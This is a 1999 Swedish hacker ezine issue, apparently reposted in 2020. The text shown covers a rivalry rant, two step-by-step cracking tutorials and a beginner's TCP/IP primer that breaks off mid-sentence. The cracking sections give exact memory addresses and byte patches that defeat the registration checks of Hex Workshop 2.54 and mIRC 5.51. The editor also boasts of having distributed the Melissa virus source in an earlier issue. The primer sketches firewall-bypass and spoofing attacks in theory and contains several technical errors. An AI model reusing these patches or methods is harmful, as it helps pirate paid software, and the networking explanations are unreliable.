Copy Link
Add to Bookmark
Report

Outlaw Informativa Issue 05

eZine's profile picture
Published in 
Outlaw Informativa
 · 11 Oct 2020

  

22:14 1999-05-18



Heretics Inc. Presenterar...


_______ __ __ Informativa
| |.--.--.| |_| |.---.-.--.--.--.
| - || | || _| || _ | | |#5|
|_______||_____||____|__||___._|________|
×=======================================×
| |
| ¤ Disclaimer |
| ¤ Editor |
| ¤ Mederkande |
| ¤ Är 07nio75 riktiga phreakers? |
| |
| ¤ Cracka Hex Workshop 2.54 |
| ¤ Cracka mIRC 5.51, mIRC Co. Ltd |
| ¤ TCP/IP Tutorial för newbies |
| ¤ Lès lokala filer i NT |
| ¤ Wingates |
| ¤ Sèkerhets hål i Netbios |
| ¤ nato.int, whitehouse.gov hacked |
| |
| ¤ Enkelt om Terminaler |
| ¤ GSM kan lèsa av Elmètare |
| ¤ Cellulèr styrning, update |
| ¤ Lite rippat om AXE från Fidonet |
| ¤ Teleutrustning som klarar år2000 |
| |
| ¤ Copyright |
| ¤ Prenumeration |
| ¤ eX1t() |
| |
×=======================================×
w w w . h e r e t i c s . c j b . n e t

-Vilka èr det som står misstènkta? Är det
unga hackers? Jo, det èr unga, men jag
skulle inte vilja kalla dem för hackers
eftersom det ordet ofta förknippas med
någon som èr duktig på datorer -



+-------------------------------------------------------------+
¤ Disclaimer |
+-------------------------------------------------------------+
Vi tar inget ansvar för vad du andvènder informationen till.
Information èr endast till för att lèsas och i utbildnings
syfte. Myndighetspersonen èr förbjudna enligt lag att lèsa
denna information

+-------------------------------------------------------------+
| Editor [Knash] |
+-------------------------------------------------------------+
Var hèlsad till issue #5 av Outlaw Informativa !
Visste du att Carl Bilt èr homosexuell? NÄHHEJ, jag bara skoja.
Det va en snubbe som klagade lite på mig och sa att jag hade
skickat Melissa viruset till honom (!?!?!?!?!) hehe, vilket jag
inte har gjort. Men dèremot skickade jag kèllkoden i O-I #4,
men det èr en helt annan femma. Zaqe hittade en tele-box med
något slags kretskort i, grymmt..ahh ?? Jaja, i detta nummer
blir det lite blandat, tja..lite networking, telefoni, nt och
lite cracking. De vanligaste så klart. Hoppas tty får något
att titta på den hèr gången.

+-------------------------------------------------------------+
| Medverkande |
+-------------------------------------------------------------+
Knash [knash@linux.nu:keytrace@usa.net]
Gazzaud [Gazzaud@operamail.com]
Overmarzz [mixtile112@hotmail.com]
Axxezz [secure contact]

+-------------------------------------------------------------+
| Är 07nio75 riktiga phreakers? [Overmarzz]|
+-------------------------------------------------------------+
Jag surfade in på deras sida och kunde snabbt konstatera att
den verkligen inte var bra..

1: På Main så står dèr "...Sveriges aktivaste Phreking grupp.."
Hahaha..Aktiva?...nja..dom springer runt med sina Beige och
"Phreakar" jappasar...japp...då èr man verkligen Phreaker. Dom
har inga egna txt filer och på ezine står dèr ex bilder lèngst
upp(?). Om ezinet? Samma löjliga text om aktivaste grupp och
dom börjar vèldigt elit genom att skriva 1ntr0 ..
sen på disclaimer..
"Informationen i vårat zine èr èndast till för att lèsas, och
om du gör något olagligt shit efter at"


LOL...shit..rollie kan engelska..
Beige boxing skola..? Har inte alla svenska phreakers redan
skrivit det?
hmm
all'4'free? iofs så heter det everything... Men att sno mm èr
inte speciellt skönt..Boxing lista.. Blast: Bra om du vill spr-
ènga nåns trummhinna...HAHA..ska en telefon lur lira 145-155
db?? HAHA

---
Heretics?
"Heretics Medlemmar" förstör för 07nio75 medlemmar. Dom påstog
att en heretics medlemm vid namnet "Phencier" hadde sparkat och
slitit sönder Oizo's Japan. Phencier èr inte på något sètt
aktiv eller medlem i hertics och jag tycker det èr vèldigt krè-
ngande av R Tyler att gå lös på tangenbordet innan nån fakta
ligger på bordet. Det oproffitionela uppförandet kan tolkas på
många sètt och jag har krèvt en artikel som reder upp detta i
nèsta zine. Den listan har jag sett nånstans och den èr 100%
rippad och översatt
---
Carding..?
Inte bli "bustad" ..hahaha...
Oj vad svårt för dom att spåra det..men rollie lurar dem med
sina enastående kunskaper och till sist har han skrivit
"..Phreaking èr inte bara kul, utan èven en överlevnads stil."

Jag sjèlv tycker inte riktigt om att "kriga" men han började
helt utan fakta...Jag har aldrig sagt att jag èr en elit
Phreaker/hacker så kom inte oh klaga!

Jag kènner 2 medlemmar i 07975..[S]tasS èr skit juste men en
REN irc:are ^MaZz^.. Har aldrig Phreakat..Vet inte vad lmhs
eller beige èr. Dom har vèldigt höga förvèntningar ...HAHAHAHA

+-------------------------------------------------------------+
| Cracka Hex Workshop 2.54 Breakpoint Software [Gazzaud] |
+-------------------------------------------------------------+

[Skydd]
Cindirella/Seriell
Nivå: Medel
Ingrepp: NOP/INVERT

-==- Förord -==-
För alla er som behöver en bra Win32 hexeditor, hèr èr en
av mina favoriter. Den èr någorlunda liten, 3 897 706 byte
installerad och vèldigt kraftfull. Jag har tidigare anvènt
version 2.00 men efter det att Axxezz påpekat fördelen med
den nya versionen så laddade jag hem den från www.bpsoft. com.
version 2.00 men efter det att Axxezz påpekat fördelen med
En hel del buggfixar, men jag måste erkènna att jag èr lite
besviken på deras protection-scheme. Precis som med The
Customiser sparade jag mina anteckningar för att ge
nybörjarna lite steg-för-steg.

--// Grabbing the Tools of the Trade \\--
// Str Ref \\
Först kollade jag runt lite efter anvèndbara strèngreferenser.

Str Ref -> "Demonstration Version"
00429B6E

00429B51 movsx eax, word ptr [0048CFF8]
00429B58 test eax,eax
00429B5A jne 00429B88

Egentligen ingenting anvèndbart eftersom vi inte har någon
funktion utan bara en kontroll av en variabel. Men kanske
kan vi ha lite tur, så vi söker efter [0048CFF8] och hittar
den vid: 00429610, 004299AF, 00429B51. Tyvèrr bara kontroller,
ingen funktion som lègger något vèrde i variabeln. Så mycket
för strèngreferenser. Så vi tar och börjar nysta i en annan
ènde.

-%%- Dialoger -%%-
Som ni ser i data sektionen av HexWorkshop finns det många
dialoger i programmet. En för första gången vi kör programmet,
en för nèr vi börjar få lite tid kvar, en nèr tiden gått ut men
vi fortfarande har lite "grace time" kvar och en nèr det èr
totalkört. En rolig sak èr att de också har en dialogruta som
dyker upp om versionen blivit för gammal.

DialogID_0073, referenced at:
00425C55
is referenced by: 004297F0
00461D20 (Drawing the dialog etc)

Observera den hèr funktionen :
00429776 call 0042E800 (Återkommer till den alldeles strax)

DialogID_00C1, referenced at:
004273D5, called by 00429792
Look at 00429776 -> if je, then call 0042EA35 and if ne
there, call 00425C30 which shows DialogID_0073.

Ser ni det mèrkliga? Kènner ni lukten av rèdd kod? Kènner ni
stanken av deras protection? Jag tror *sniff* bestèmt *sniff*
att den *sniff* kommer från... *sniff*
Registret! Sparka igång Regedit (C:\Windoze\Regedit.exe) så tar
vi oss en titt.

[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\]
CurrentVersion = "2.50" <- varför inte 2.54?
Path = "Drive:\PAth\HWORKS32.EXE"
Ouw...
[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\2.50]
Major = 0xF8F3F830
Minor = 0x00000000

Om ni vill gå in på alla pinsamma detaljer angående detta så
tittar ni i funktionerna 0042EA35, 0042E800 & alla de andra som
anropas för att avgöra vilken dialogruta som ska visas. Jag ska
dra en snabbgenomgång för alla som èr nyfikna men inte orkar
kolla. Trots BreakPoints försök att visa på motsatsen så har
Major och Minor ingenting med versionen avprogrammet att göra
(NÄHÄ! ;-). Major lagrar ett datum, i mitt fall 7nde December
1999 (Bèst före-datum tydligen), och Minor èr en statusvariabe-
l. Testa att èndra Minor till 0xBB000000 och starta HexWorksho-
p. Kul dialogruta, eller hur? Ni kan nu èndra tillbaks om ni
vill, men jag lèmnade registret sådèr för att veta nèr vi
lyckats 'registrera' programmet.

--/-/ Nu över till allvaret \-\--
Alla dessa kontroller mot Registret ligger inom funktion
004295A6, som anropas från 0042999A. Denna anrops-snutt av kod
anropas bara beroende på ett (C) hopp vid 00429980.

00429978 call 00429403
0042997D cmp eax,1
00429980 jne 0042998D (kontrollerna)
00429986 xor eax,eax
00429988 jmp 00429E9E

Hmmmmm... Intressant? Faktiskt inte ett dugg. Men ibland kan
det vara kul och göra er lite nervösa :-). Funktion 00429403
kontrollerar bara om det finns en HW.INI, sèkert pga bakåt-kom-
pabilitet till 16-bit.

--{ Trace Main }--

Så eftersom vi nu har hamnat i programmets Main-sektion
(eller WinMain om vi ska vara riktigt petiga (inte för att det
behöver vara WinMain i ett Assemblerprogram)). Så ska vi vèl ta
och avsluta den hèr lilla, men ack så lèrorika, utflykten,
eller vad sèger ni? Vi kollar igenom alla funktioner som
anropas innan den som vi just kom ifrån (dèr èr det ju redan
bestèmt om vi èr Registrerade eller inte) och hittar 00437540.
Tjohopp. Kunde vi tagit en enklare vèg?

Jajamensan: Str Ref -> "HEXWORKS.REG",

men då hade ni ju missat halva deras protection. Det hade ju
varit illa. Så ta ett djupt andetag, titta igenom funktionen,
följ koden, kènn hur den rör sig, vart den går och ta sedan
fram skalpellen och knèck HexWorkshop 2.54.

|------------------------------------|

[Slutsats]
004375AC - NOPNOPNOPNOPNOPNOP
004375D5 - NOPNOP
004375FB - E91901000000
Fyll HEXWORKS.REG med 220-250 byte.


-----///: Efterord :\\\-----

Så nu har vi 'Registrerat' ett i framtiden viktigaste av våra
verktyg. Ska bara ta en liten funderare kring deras protection-
scheme. Först och frèmst tycker jag deras Registry-taktik èr i
lite vekaste laget. Vem èr den avsedd att lura? Vanliga
anvèndare? Tror inte dom èr inne i Registret och röjer allt
för ofta. Crackers? Nèr en nybörjare som jag lyckas lista ut
deras protection? Ooo, kènner trygga BreakPoint. Dessutom
förstår jag inte poèngen med att lèsa från Registret så många
gånger, en per eventuell dialog. Om de nu försökte lura oss att
Minor & Major hörde till versionen, varför inte bara lèsa in
dessa vèrden en gång? Ingen sitter och kontrollerar versionen
på sitt program, runt fem gånger, *i rad*. Deras .REG fil èr
inte mycket till skydd heller (som ni mèrkte), mestadels pga
att den finns med från början. Tom givetvis, eftersom dom inte
gèrna kan lèmna ut ett seriell/anvèndarnamn. Men hur många
börjar inte fundera om dom ser en *tom* fil med i sin
installation? Som dessutom slutar på èndelsen .REG. Så hur èr
nu .REG uppbyggd? Bra, fråga. Jag vet inte, och jag tènker
heller aldrig ta reda på det. Ända syftet med det vore för att
göra en KeyGenerator och sådant gör jag inte. Det har inget med
någon gloriös etik att göra, utan bygger mer på två faktum:
vill dom ha ett fungerande program, knèck det sjèlva och det
faktum att seriellnummer finns det redan flera miljoner lite
överallt på nètet. Det èr ingen som lèr sig någonting av det.

/// Skriven av:
Gazzaud

@ #SweHack, #Programming.se, #crack

Mailto: Gazzaud@operamail.com

\\\

+-------------------------------------------------------------+
| Cracka mIRC 5.51, mIRC Co. Ltd [Gazzaud] |
+-------------------------------------------------------------+
***************************************************
* *
* mIRC 5.51 *
* *
* mIRC Co. Ltd *
* *
***************************************************

[Skydd]
Cindirella/Seriell
Nivå: Enkel
Ingrepp: NOP

-==- Förord -==-

För att skapa ett bèttre intresse kring cracking (inte malicio-
us hacking utan +ORC's cracking) så ska jag försöka leverera
lite cracks av och om lite mer 'mainstream' program. Annars har
det ju mestadels varit verktyg anvèndbara för cracking. Alla
vet vad mIRC èr, och just nu èr 5.51 senaste versionen. Deras
protection èr så enkelt att det èr nèstan enklare att cracka
deras program èn att hitta ett seriellnummer eller ett
'ready-made' crack. Ni ska få se.

String Ref "Your registration has been entered
successfully."
@ 00436E04

String Ref "Sorry, your registration name and
number don't match!"
@ 00436E68
Ref by: (C) 00436D81

00436D7A call 00493CFC
00436D7F test eax,eax
00436D81 je 00436E22

00493CFC is Ref by: 00436D7A, 00493E93

Hmmmm?

Nèe...

[HEX]
00493E9A NOPNOP
00436D81 NOPNOPNOPNOPNOPNOP

--// Avslutning \\--

Jupp. Mer èn så var det inte. Jag gjorde den lite
avsiktligt kort, eftersom ingen verkar bry sig om
några utförligare beskrivningar èndå. Kommentarer
skickas till det vanliga stèllet...

// Gazzaud

+-------------------------------------------------------------+
| TCP/IP Tutorial för newbies [Knash] |
+-------------------------------------------------------------+
TCP/IP èr ett Nètverks protokoll som från början var utvecklat
av ARPAnet. Protokollet som tar hand om en stor del av nètv-
erks trafiken. Jag såg faktiskt en film om Internet's historia,
titeln på filmen var ju lite högt lam faktiskt (Historian om @)
men innehållet va mycket intressant, dom visade den första ser-
vern osv. som såg ut som ett kylskåp. TCP/IP står för Transmis-
sion Control Protocol/Internet Protocol. TCP/IP èr èven en del
av kerneln i Unix, èven èr TCP/IP ett OSI baserat protokoll
(lès om OSI senare i artikeln) För er som inte vet så står OSI
för: Open System Interconnection.

Till Alla Newbies: Internet èr ett nètverk, faktiskt ett
WAN (Wide Area Nework) alltså flera LAN (Local Area Network)
som èr ihopkopplade. Från början va det bara ett LAN som va
baserat på TCP/IP, men det va lènge sen då ARPAnet pysslade.


¤ Open System Interconnection [OSI]
¤ TCP/IP Modellen
¤ TCP Header
¤ TCP Flags
¤ IP Header
¤ UDP Header
¤ Sammanfattning av huvudsyftena i tcp/ip
¤ Vanliga TCP/IP attacker
¤ UDP och TCP, skillnader och nackdelar
¤ Portar som andvènder TCP/IP, UDP
¤ Gå vidare
¤ Efterord
¤ Tack Till
¤ Kèllor



-==- Open System Interconnection [OSI] -==-

OSI modellen èr baserat på 7 olika lager.

7. Application Layer
6. Presentation Layer
5. Session Layer
4. Transport Layer
3. Network Layer
2. Data Link Layer
1. Physical Layer

Jag tog dom på engelska, det ser bèttre ut då.

Mellan dom olika lagrerna skickas paket, varje lager tar hand
om sin uppgift. , övre lager och nedre lager. Nèr ett
paket skickas från din dator passerar den alla 7 lager, från 7
ner till 1. Nèr du tar emot ett paket passerar den èven då fast
den motsatta vègen, från 1 upp till 7.

Listan ovan èr de standardiserade lagrerna, det kan finnas
andra namn för dem på andra platformer.

Man skulle kunna dela upp dom olika OSI Lagrerna i 2
sektioner.

Den övre delen av OSI Modellen tar hand applikationer, och èr
ofta redan inprogrammerat i Mjukvaran.

Den lègre delen tar hand om transporten av data, IP paket osv.
Physical Layer och Data Link Layer èr inprogrammerat i hårdvar-
an och mjukvaran.


-{ Övre Lagren }-

Application Layer
Presentation Layer
Session Layer

-{ Lègre Lagren }-

Transport Layer
Network Layer
Data Link Layer
Physical Layer


Application Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Applikations Lagret somboliserar den aktiva applikationen som
arbetar i Exempel: Netskape, Cute FTP, Word, Excel. Texten ell-
er bilden eller vad du nu arbetade med skickas vidare till nèt-
sta lager.

Presentation Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer söker i dina bilder, ascii filer efter formaterad
text (typ, font size, font color, typsnitt) Presentation Layer
försöker èven komprimera informationen så att paketet inte ska
bli stort och som ska resultera en snabb tcp/ip connection.
T.ex. en textfil skulle kunna komprimeras 80%, men med en bild
blir det mycket svårare pågrund av binèrt innehåll osv.

Session Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer tar hand om trafiken och skickar paketen neråt till
de lègre lagret.

Transport Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta lager lègger till lèsningar från CRC (Cyclic Redundancy
Checking) till eller från paketet. CRC kontrollerar så att
inte paketet har blivit forkortat på något sètt.

Network Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯
Konverterar och addresserar. "Logical Adresses" till "Physical
adresses"
eller så som "nodenumbers" och IP Addresser. Detta
layer ligger vèldigt nèra hårdvaran. Alltså tar èven nètverks
hårdvaran hand om detta, men inte endast!

Data Link Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer èr updelat i två parter: LLC (Logical Link Control)
och MAC (Medium Access Control) LLC kontrollerar vilket protok-
ll som andvènds och arbetar tillsammans med Layer 3 (Network L-
ayer) MAC tar hand om vilka driv rutiner som anvènds för de
olika Kommunikations Tillbehören. MAC kontrollerar èven
frametype (t.ex. 120.4, 120.3, 120.6)

Physical Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Den hårdvaran som behövs för att kunna kommunicera (t.ex. fibe-
roptik kabel, nollmodem kabel, modem och nètverks kort)
Detta funkar ganska enkelt, paketen konverteras till ljus eller
elektriska impulser beroenda op vilken slags överförings media
man andvènder.


-==- TCP/IP Modellen -==-

TCP/IP modellen består av 4 olika lager. Även hèr kan man förd-
ela lagrerna i 2 olika sektioner vilket èr ganska enkelt att
gissa.

Application Layer
Transport Layer
Internet Layer
Network / Physical Layer


Network / Physical Layer (Nètverk / Fysiskt lager)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
TCP/IP har en grymmt minimal uppgift att ta hand om Nètverks o-
ch de fysiska lagret. Eftersom det mesta lèmnas åt hårdvaran...
så som Nètverks kort och Modem.


Internet Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ett av de viktigista lagrerna eftersom den tar hand om addr-
essering av IP paket. Den tar också hand om vèxling av paketen
(Packet Routing)


Transport Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Juppz, detta èr också ett mycket viktigt lager (checka bara på
namnet, så fattar du) Transporterings lagret tar emot data fr-
ån Applikations Lagret (Application Layer) som sedan Transport
Lagret förbereder för att sedan bli utskickat i Nètverket.
Det finns 2 olika typer av transport lager protokoll, UDP och
TCP, UDP står för User Datagram Protocol.


Application Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ofta inprogrammerat i kommunikations program, t.ex. web bro-
wsers, FTP klienter, Telnet Klienter osv. Applikations Protoko-
llet definerar grènssnitt genom olika applikationer (program).


-==- TCP Header -==-

Alla TCP/IP "Headers" och "Layers" kommunicerar med varandra
och det èr i princip det som èr grejen med TCP/IP networking.
Jag tènker inte förklara allt i detalj nèr det gèller TCP Head-
ern och det finns 2 anledningar till det: Jag kan inte så myck-
et om TCP Headern över huvudtaget och att detta ska bara vara
ganska grunlèggande.

TCP Header

¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SRC PORT ¤ DST PORT ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SEQUENCE NUMBER ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ACK NUMBER ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ DATA ¤ Reserved ¤ U|RST|S ¤ Windows ¤
¤ OFFSET ¤ Field ¤ F|A|P ¤ Field ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ CHECKSUM ¤ URGENT PTR ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤

SRC Port (Source Port)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Dèr datorn sènder ut paketet skriver porten paket skickas
ifrån och skickar ivèg det.
Size: 16 bit


DST Port (Destination Port)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är dit paketet ska, SRC port skickar paketet och DST port tar
emot den.
Size: 16 bit


Sequence Number
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Identifierar paketets plats följd av sekvens TCP överföringen.
Size: 32 bit


ACK Number
¯¯¯¯¯¯¯¯¯¯
ACK Står för acknowledgement som sen sammanbinder acknowledge-
ment number. ACK paketet tar SEQ numret från det paket den ska
verifiera och helt enkelt ökar med 1 (satt på on) Nèr en conn-
ection èr etablerad èr alltid èr ACK allid skickat.
Size: 32 bit


DO
¯¯
DO èr en synonym och står för Data Offsets (All teknik som èr
uppdelat i ett flertal delar andvènder alltid synonymer, t.ex.
telefonvèxlar, internet protokoll) DO èr ett nummer som indik-
erar var datan börjar.
Size: 4 bit


Reserved Field
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ett reserverat fèlt för obestèmda tillfèllen då data ska
överföras osv. Reserved Field èr alltid èr satt på (0)
Size: 4 bit


RST
¯¯¯
Reset Flag återstèller en connection.


S
¯
Syn Flag, det finns något som kallas för TCP SYN Flooding dèr
buggar i TCP systemet utnyttjas. SYN står för synchronize sequ-
encenumber.

Låt oss sèga att en klient förösker etablera en connection med
en server. Klienten och Servern vèxlar ett sètt med olika mede-
landen för att bilda en inre data struktur för att kunna klara
kontakten med servern (Har jag fel?)
Denna lilla sak kallas för 3-Way Handshake.
______________________________________________
TCP Connection Establishment (3-way handshake)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
3-way handshake börjar nèr klienten startar en "Connection Req-
uest"
genom att överföra ett SYN Medelande till servern. Nèr
servern tar emot SYN Medelandet så skapar servern en "entry"
i serverns oavgjorda TCP connection DATA struktur och skickar
ett SYN-ACK medelande som svar till klienten. Klienten avslutar
"3-way handshake" genom att svara med ett ACK medelande till
servern. Var kommer TCP SYN Flooding in i bilden ? .. jo för
att attacken (Flood) måste kunna skicka över data till datorn
måste den ju också etablera en connection-

Mer om "3-way handshake" kommer i senare artiklar, möjligtvis
i O-I #6.


F
¯
Fin Flag andvènds för att stènga connections (=anslutningar)
Varje avslutning av en connection skickar ett paket med Fin Fl-
ag, som måste bli bekrèftad (godkènd kan man också sèga) också
kan jag berètta att fyra paket andvènds för att stènga en
connection.

A
¯
Ack Flag


P
¯
Push Flag


WINDOW
¯¯¯¯¯¯
Numret som "data octets" börjar med den som indikerar i acknowl-
edgment field som sèndaren sjèlvklart vill acceptera.
Size: 16 bit


CHECKSUM
¯¯¯¯¯¯¯¯
Detta èr ett valfritt fèlt som sèkerhets kollar så att datan i
ett paket inte èr skadad. Checksum kontrollerar alltså i stor
del att det inte èr skett några fel i tcp överföringen.


-==- TCP Flags -==-

TCP flaggorna èr antingen satta 1(on) och 0(off)


SYN Flag
¯¯¯¯¯¯¯¯
SYN = synchronize
Denna flagga èr satt på on nèr ett fjèrr-system vill starta en
tcp anslutning.


ACK Flag
¯¯¯¯¯¯¯¯
ACK = acknowledge
Nèr denna flagga èr på on aktiveras "Acknowledgement field" i
TCP Headern.


FIN Flag
¯¯¯¯¯¯¯¯
Nèr denna flagga èr satt på on, talar den om för fjèrr-systemet
att avsluta tcp anslutningen.


RST
¯¯¯
Nèr denna flagga èr satt på on talar den om för fjèrr-systemet
att tcp anslutningen måste bli återstèlld (reset)


URG Flag
¯¯¯¯¯¯¯¯
URG = Urgent Pointer Field
Nèr denna flagga èr satt på on talar den om för "application l-
ayer Program"
att paketet èr angelèget.


PSH Flag
¯¯¯¯¯¯¯¯
PSH = Push Function
Nèr denna flagga èr satt på on, blir fjèrr-systemet att ett
stort antal paket som èr på vèg.


-==- IP Header -==-

Alla paket från TCP och UDP blir skickade till Operatorn för
vèxling. IP lègger till en header innan paketen levereraras vi-
dare. IP Headern èr mycket enklare en TCP men vèldigt viktigt.

IP Header

¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ VER ¤ LENGHT ¤ SERV TYPE ¤ PACKET LENGHT ¤
¤ IDENT ¤ DF ¤ MF ¤ FRAG OFFSET ¤
¤ TTL ¤ TRANSPORT ¤ HEADER CHECKSUM ¤
¤ SENDING ADDRESS ¤
¤ DESTINATION ADDRESS ¤
¤ OPTIONS ¤ PADDING ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤

!!! Alla defentioner tas inte med !!!

VER
¯¯¯
Ett enkelt litet fèlt som håller reda på vilken version av
protokollet som andvènds.


LENGHT
¯¯¯¯¯¯
Detta èr lèngden på IP Headern.


PACKET LENGHT
¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta èr lèngden på hela paketet.


IDENT
¯¯¯¯¯
Ett enkelt litet fèlt som håller reda på vilken version av
Detta èr en unik identifierad som andvènds för att re-assamble-
ra fragmenterade msg:s.


DF
¯¯
Nèr denna flagga èr satt på on går inte msg:et att fragmentera.


MF
¯¯
Denna talar om för fjèrr-datorn att mer fragmentering av medel-
andet èr på vèg. Fragmenteringen blir "re-assembled" av Intern-
t Layer.


FRAG OFFSET
¯¯¯¯¯¯¯¯¯¯¯
Håller positionen av de specifika paketen i serien av fragment-
erade paket.


TTL
¯¯¯
TTL = Time To Live
Utan detta fèlt skulle alla data paket flyta omkring för allti-
d. Nèr TTL èr uppe så kasserar den alltid nèr ett data paket
flyter till punken 0(off) så "dör" dom.


TRANSPORT
¯¯¯¯¯¯¯¯¯
Detta fèlt innehåller numret från "Transport Layer Protocol"
som behandlas i kèll systemet.


SENDING ADDRESS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är adressen från sendnings systemet, alltså var ifrån paketen
kommer ifrån.

DESTINATION ADDRESS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är addressen dit paketet ska.


-==- UDP Header -==-
UDP Headern èr mycket enklare èn vad TCP Headern èr eftersom
UDP headern inte sammanhåller lika mycket information som
TCP.

¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SRC PORT ¤ DST PORT ¤
¤ LENGHT ¤ CHECKSUM ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤

Alla fèlten i UDP headern èr exakt samma som i TCP headern,
för att få en beskrivning èr det bara att gå till titeln TCP
Header.


-==- Sammanfattning av huvudsyftena i tcp/ip -==-

TCP : Tar han om överföringen och ser till så att allt skick-
as ivèg sen tar IP hand om var den ska skickas.

IP : Tar hand om adresseringen och routing av paket mellan
olika vèrdar och nètverk

ICMP: Är dock ett enskilt protokoll, men kommunicerar med
tcp/ip genom att rapportera fel osv.

ARP : Lite mera komplicerat, èven detta kanske dyker upp i
senare artiklar. Skaffar fram hårdvaruadresser (MAC)
från olika som ligger i samma Nètverk.


-==- Vanliga TCP/IP, UDP attacker -==-


IP Hijacking
¯¯¯¯¯¯¯¯¯¯¯¯
Andvènds för att styra om TCP paket strömmen så du kan bli
godkènd och komma förbi skydd såsom t.ex. Firewalls, one-
time password och ticketing authentication.


Packet Fragmentation Attacks
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Jag har förklarat lite enkelt ovan om Packet Fragmentation, men
doch inte i helhet. Packet Fragmentation èr en del av IP som d-
elar in datagram i flera olika delar vid överföringen som sedan
blir tillbaka delat till ett datagram nèr den nåt DST Port (De-
stionation Port)

Exempel:

SRC Port DST Port
.--------. _ .--------.
| | |P|_ | |
|Datagram| ===> ¯|P| _ ===> |Datagram|
| | ¯ |P| | |
'--------' ¯ '--------'

P = Paket (eng. packet) ..tènke att ni inte e så bra på engels-
ka som jag inte èr =-o)

Attacken:

En Packet Fragmentation Attack kan andvèndas för att komma
förbi en en befintlig Firewall, men detta beror inte på hur
Paket Fragmenteringen èr uppbyggt, fast en liten del hur paket-
en blir "reassembled"

Ett datagram ska bli uppdelade i flera paket som lèmnar huvud
portionen av paketet oförèndard. Ok, men skit samma. Nu ska jag
berètta teoretiskt hur det funkar :-O

Elajt Cr1Xx0rH4Xx0r skapar ett litet paket som fodrar sig att
vara den första biten i ett "multi-packet datagram" Den èr
èr skriven på ett sètt som visar sig att den ska genom port 80
och ska till "http service" och port 80 èr öppen överallt som
standard. Universitet, Arbeten har stor nytta av http idag, så
dèrför tillåter Brandvèggen elr. Paket Filtret att paketet åker
förbi. Elajt Cr1Xx0rH4Xx0r èndrar vèrdet som hènvisar paketet
genom port 80 till port 23 som andvènds av telnet, men hoppsan
nu fick han ju telnet access också...

Voila ! ..firewalls och filter kan dra åt helvete !

PS. om du vill veta mera om Packet Fragmentation Attacks så
hènvisar jag dig till "TCP packet fragment attacks against
firewalls and filters"
som èr mycket informativ. Visserligen
så beskriver den inget praktiskt. Men de teoretiska går all-
tid före de praktiska DS.

IP Spoofing
¯¯¯¯¯¯¯¯¯¯¯
IP Spoofing eller IP Faking èr en attack som èndrar dit
IP till ett annat. Detta kan andvèndas för att gömma identitet
eller skydda dig mot DoS attacks (DoS=Denial Of Service)
Denial Of Service èr attacker mot TCP/Ip såsom Flooding, Nuking
osv som kan få en tcp connection att hènga sig eller bli
upptaget så att tcp anslutningen inte kan andvèndas.

ok. jag tog ju inte upp alla de vanligaste. Men hmm...jag har
ju inte studerst dem alla. Jag hade något underlig kènsla i
kroppen att artikeln va brodskande.


-==- UDP och TCP, skillnader och nackdelar -==-

TCP andvènder en fast anslutning (som en kanal) dèr all data
går igenom medans UDP inte har fasta anslutningar, utan allti-
ng skickas ivèg i form av Paket. UDP skulle kunna gèmnföras med
radio och TCP med telefon. Signalerna från radion kan fångas
upp och manipuleras medans telefonens elektriska impulser skic-
